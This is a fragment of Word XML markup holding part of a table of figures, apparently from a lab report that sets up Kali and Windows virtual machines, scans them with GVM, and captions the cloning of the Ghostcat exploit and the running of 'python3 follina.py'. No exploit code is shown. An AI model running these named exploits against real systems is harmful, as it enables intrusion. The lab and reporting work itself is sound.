        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>69</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5FEE1C95" w14:textId="0990AD73"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79" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 54: Setting up part 1 of the Task</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981779 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>70</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4CCB679B" w14:textId="4E987691"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80" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 55: Using the Task to set up Scan Target</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981780 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>71</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3252793B" w14:textId="6664302B"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81" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 56: WinDev2016 &amp; Kali Linux Virtual Machines</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981781 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>72</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="210190B2" w14:textId="7CB53482"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82" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 57: Successful Download of MSDT-Follina</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981782 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>72</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5418C259" w14:textId="432C8F6F"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83" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 58: Follina.py in the msdt-follina folder</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981783 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>72</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="54E4A753" w14:textId="28A99C7A"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84" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 59: Virtual Machines in Oracle VirtualBox</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981784 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>73</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="62F3F092" w14:textId="1A5ED3C1"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85" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 60: Windows Network Setup</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981785 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>73</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4360ED93" w14:textId="4D2D5CF6"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86" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 61: Kali Linux Network Setup</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981786 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>74</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="788706C0" w14:textId="1969BC50"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87" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 62: IP Address for Windows 7</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981787 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>74</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6F1AF898" w14:textId="67461211"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88" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 63: IP address for Kali Linux</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981788 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>75</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="78BFE15E" w14:textId="7B9B52A5"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89" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 64: Creation of Flag 2</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981789 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>75</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7435C09E" w14:textId="743A1B4B"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90" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 65: Ping command used to test connectivity</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981790 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>76</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4D2B55C6" w14:textId="544CBA5B"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91" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 66: Clone Ghostcat from Github Repository [55]</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981791 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>76</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="128667D2" w14:textId="7CEBE90D"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92" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 67: List files in Ghostcat Directory [55]</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981792 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>77</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4949A36D" w14:textId="3FA966C2"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93" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 68: First Scan with GVM against xxx.xxx.xxx.0/24</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981793 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>79</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="290F7905" w14:textId="57774066"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94" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 69: GVM Scan at 1%</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981794 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>80</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="51A28849" w14:textId="19E72AC3"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95" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 70: 99% of scan completed</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981795 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>81</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="63533FB2" w14:textId="0892EE77"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96" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 71: Vulnerabilities by Severity</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981796 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>82</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0BBF6E14" w14:textId="434045E9"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97" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 72: Command 'python3 follina.py'</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981797 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>83</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="49EEA3A5" w14:textId="4E15866D"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98" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
